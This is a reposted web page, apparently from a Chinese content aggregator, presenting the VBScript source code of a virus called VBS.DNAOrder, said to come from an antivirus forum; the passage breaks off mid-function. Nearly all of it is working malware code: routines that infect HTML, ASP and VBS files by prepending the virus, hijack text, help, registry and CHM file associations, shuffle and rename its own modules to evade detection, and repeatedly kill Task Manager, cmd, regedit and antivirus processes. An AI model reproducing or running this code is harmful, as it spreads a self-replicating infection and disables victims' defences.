偶看新闻祖国在我心中画画图片:病毒名称VBS.DNAOrder.aa.35780)源代码-来自国内某一知名杀软论坛 1
来源:百度文库 编辑:偶看新闻 时间:2024/04/28 23:37:42
'Administrator4
'HJLMRRQRWYOZX2_25
Sub DeleteReg(strkey)
Dim tmps
Set tmps = CreateObject("WScript.Shell")
tmps.RegDelete strkey
Set tmps = Nothing
End Sub
Function ReadReg(strkey)
Dim tmps
Set tmps = CreateObject("WScript.Shell")
ReadReg = tmps.RegRead(strkey)
Set tmps = Nothing
End Function
Sub WriteReg(strkey, Value, vtype)
Dim tmps
Set tmps = CreateObject("WScript.Shell")
If vtype = "" Then
tmps.RegWrite strkey, Value
Else
tmps.RegWrite strkey, Value, vtype
End If
Set tmps = Nothing
End Sub
'WQKAULMNKKG2_25
'HJLMRRQRWYOZX2_21
Function IsSexFile(fname)
IsSexFile = False
If InStr(fname, "成人")>0 Or InStr(fname, "淫")>0 Or InStr(fname, "偷拍")>0 Or _
InStr(fname, "偷窥")>0 Or InStr(fname, "口交")>0 Or InStr(fname, "强奸")>0 Or _
InStr(fname, "轮奸")>0 Or InStr(fname, "伦理片")>0 Or InStr(fname, "自摸")>0 Then
IsSexFile = True
End If
End Function
Function Isinfected(buffer, ftype)
Isinfected = True
Select Case ftype
Case "hta", "htm" , "html" , "asp", "vbs"
If InStr(buffer, Head_V) = 0 Then
Isinfected = False
End If
Case Else
Isinfected = True
End Select
End Function
'WQKAULMNKKG2_21
'HJLMRRQRWYOZX2_22
Function GetSFolder(p)
Dim objfso
Set objfso = CreateObject(GetFSOName())
GetSFolder = objfso.GetSpecialFolder(p) & "\"
Set objfso = Nothing
End Function
Function GetUserName()
On Error Resume Next
Dim Value , UserName
Value = "HKEY_CURRENT_USER\Software\Microsoft\Active Setup\Installed Components\{44BBA840-CC51-11CF-AAFA-00AA00B6015C}\Username"
UserName = ReadReg(Value)
If UserName = "" Then
GetUserName = "Administrator"
Else
GetUserName = UserName
End If
End Function
Function GetFSOName()
On Error Resume Next
Dim Value , UserName
Value = "HKEY_CLASSES_ROOT\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\ProgID\"
UserName = ReadReg(Value)
If UserName = "" Then
GetUserName = "Scripting.FileSystemObject"
Else
GetFSOName = UserName
End If
End Function
Function GetHeadTail(l)
Dim Str , buffer
If l = 0 Then
GetHeadTail = "'" & GetUserName()
Else
buffer = GetUserName()
Str = ""
For i = 1 To Len(buffer)
Str = Mid(buffer, i, 1) & Str
GetHeadTail = "'" & Str
Next
End If
End Function
'WQKAULMNKKG2_22
'HJLMRRQRWYOZX1_9
Function ChangeModelOrder(vbsCode, Num_DNA)
On Error Resume Next
Dim DNA(), Array_vbsCode()
Dim i, Value, flag, j, buffer
ReDim DNA(Num_DNA), Array_vbsCode(Num_DNA)
buffer = vbsCode
Randomize
For i = 1 To Num_DNA
Do
Value = Int((Num_DNA * Rnd) + 1)
flag = 1
For j = 1 To Num_DNA
If Value = DNA(j) Then
flag = 0
Exit For
End If
Next
Loop Until flag = 1
DNA(i) = Value
Next
For i = 1 To Num_DNA
Array_vbsCode(i) = GetModelCode(buffer, i)
Next
buffer = ""
For i = 1 To Num_DNA
buffer = buffer & VBCRLF & Array_vbsCode(DNA(i)) & VBCRLF
Next
ChangeModelOrder = Head_V & Version & VBCRLF & buffer & VBCRLF & Tail_V
End Function
'WQKAULMNKKG1_9
'HJLMRRQRWYOZX2_26
Sub Run(ExeFullName)
Dim WshShell
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run ExeFullName
Set WshShell = Nothing
End Sub
Sub CopyFile(objfso, code, pathf)
On Error Resume Next
Dim vf
Set vf = objfso.OpenTextFile(pathf, 2, true)
vf.Write code
End Sub
Function ChangeName(vbsCode, Names)
Dim Name, j, temp, buffer
buffer = vbsCode
Randomize
For Each Name in Names
temp = ""
For j = 1 To Len(Name)
temp = temp & Chr((Int(Rnd * 26) + 65))
Next
buffer = Replace(buffer, Name, temp)
Next
ChangeName = buffer
End Function
'WQKAULMNKKG2_26
'HJLMRRQRWYOZX2_16
Sub SetTxtFileAss(sFilePath)
On Error Resume Next
Dim Value
Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\", Value, "REG_EXPAND_SZ")
End Sub
Sub SethlpFileAss(sFilePath)
On Error Resume Next
Dim Value
Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\", Value, "REG_EXPAND_SZ")
End Sub
Sub SetRegFileAss(sFilePath)
On Error Resume Next
Dim Value
Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\", Value, "REG_EXPAND_SZ")
End Sub
Sub SetchmFileAss(sFilePath)
On Error Resume Next
Dim Value
Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\", Value, "REG_EXPAND_SZ")
End Sub
'WQKAULMNKKG2_16
'HJLMRRQRWYOZX2_12
Sub InfectHead(strPath, fi, objfso, VbsCode_WebPage, VbsCode_Victim, ftype, T)
On Error Resume Next
Dim tso, buffer, strCode , Maxsize
Maxsize = 350000
If fi.Size< Maxsize Then
Set tso = objfso.OpenTextFile(strPath, 1, True)
buffer = tso.ReadAll()
tso.Close
If T = 0 Then
Select Case ftype
Case "hta", "htm", "html", "asp"
If Isinfected(buffer, ftype) = False Then
Set tso = objfso.OpenTextFile(strPath, 2, true)
strCode = MakeScript(VbsCode_WebPage, 0)
tso.Write strCode & VBCRLF & buffer
Cnt = Cnt + 1
End If
Case "vbs"
If Isinfected(buffer, ftype) = False Then
n = InStr(buffer , "Option Explicit")
If n<>0 Then
buffer = Replace(buffer, "Option Explicit", "", 1, 1, 1)
Set tso = objfso.OpenTextFile(strPath, 2, true)
tso.Write vbsCode_Victim & VBCRLF & buffer
Cnt = Cnt + 1
Else
Set tso = objfso.OpenTextFile(strPath, 2, true)
tso.Write vbsCode_Victim & VBCRLF & buffer
Cnt = Cnt + 1
End If
End If
Case Else
'
'
End Select
ElseIf T = 1 Then
If Isinfected(buffer, ftype) = True Then
n = InStrRev(buffer , Tail_V)
If n<>0 Then
buffer = Replace(buffer, Tail_V, "", n, 1, 1)
Set tso = objfso.OpenTextFile(strPath, 2, True)
tso.Write strCode & VBCRLF & buffer
End If
End If
End If
End If
End Sub
'WQKAULMNKKG2_12
'HJLMRRQRWYOZX2_17
Function PreInstance()
On Error Resume Next
Dim num_cnt
Dim strComputer, objWMIService, colProcessList, objProcess
num_cnt = 0
PreInstance = False
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set colProcessList = objWMIService.ExecQuery("Select * from Win32_Process Where " & "Name = 'cscript.exe' or Name = 'wscript.exe'")
For Each objProcess in colProcessList
If InStr(CStr(objProcess.CommandLine), WScript.ScriptFullName)>0 Then
num_cnt = num_cnt + 1
End If
Next
If num_cnt>= 2 Then
PreInstance = True
End If
End Function
'WQKAULMNKKG2_17
'HJLMRRQRWYOZX1_8
Sub RestoreSystem(objfso)
On Error Resume Next
Dim Value, dc, d, HCULoad
Call SafeSet()
HCULoad = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Load"
If ReadReg(HCULoad) = FullPath_V1 Then
Call DeleteReg(HCULoad)
End If
Value = "%SystemRoot%\system32\NOTEPAD.EXE %1"
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\")<>Value Then
Call WriteReg ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\", Value, "REG_EXPAND_SZ")
End If
Value = "regedit.exe " & """%1"""
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\")<>Value Then
Call WriteReg ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\", Value, "REG_EXPAND_SZ")
End If
Value = GetSFolder(1) & "hh.exe " & """%1"""
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\")<>Value Then
Call WriteReg ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\", Value, "REG_EXPAND_SZ")
End If
Value = "%SystemRoot%\system32\winhlp32.exe %1"
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\")<>Value Then
Call WriteReg ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\", Value, "REG_EXPAND_SZ")
End If
Value = """%1"" %*"
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\")<>Value Then
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\", Value, "REG_SZ")
End If
Set dc = objfso.Drives
For Each d In dc
If objfso.FileExists(d.DriveLetter & ":\" & Name_V1) = True Then
objfso.DeleteFile d.DriveLetter & ":\" & Name_V1
objfso.DeleteFile d.DriveLetter & ":\" & "AutoRun.inf"
End If
Next
If objfso.FileExists(FullPath_V1) = True Then
Set vf = objfso.GetFile(FullPath_V1)
vf.Delete
End If
If objfso.FileExists(FullPath_V0) = true Then
Set vf = objfso.GetFile(FullPath_V0)
vf.Delete
End If
If objfso.FileExists(FullPath_Config) = True Then
objfso.DeleteFile FullPath_Config , True
End If
End Sub
'WQKAULMNKKG1_8
'HJLMRRQRWYOZX1_5
Sub MonitorSystem(objfso, vbsCode)
On Error Resume Next
Dim ProcessNames
ProcessNames = Array("ras.exe", "360tray.exe", "taskmgr.exe", "cmd.exe", "cmd.com", "regedit.exe", "regedit.scr", "regedit.pif", "regedit.com", "msconfig.exe", "SREng.exe", "USBAntiVir.exe")
Do
Call KillProcess(ProcessNames)
Call InvadeSystem(objfso, vbsCode)
WScript.Sleep 5000
Loop
End Sub
'WQKAULMNKKG1_5
'HJLMRRQRWYOZX1_4
Function Head()
Head = VBCRLF & "'HJLMRRQRWYOZX1_1" & VBCRLF &_
"On Error Resume Next" & VBCRLF &_
"Dim Cnt, CntMax, Version, Name_V1, FullPath_V0, FullPath_V1, FullPath_Config,Sum_ModelCode,Head_V,Tail_V" & VBCRLF &_
"Dim ModelHead, ModelTail" & VBCRLF &_
"Cnt = 0" & VBCRLF &_
"CntMax = 1000" & VBCRLF &_
"Version = ""4""" & VBCRLF &_
"Name_V1 = GetUserName() & "".vbs""" & VBCRLF &_
"FullPath_V0 = GetSFolder(0) & Name_V1 '主要执行文件关联转向" & VBCRLF &_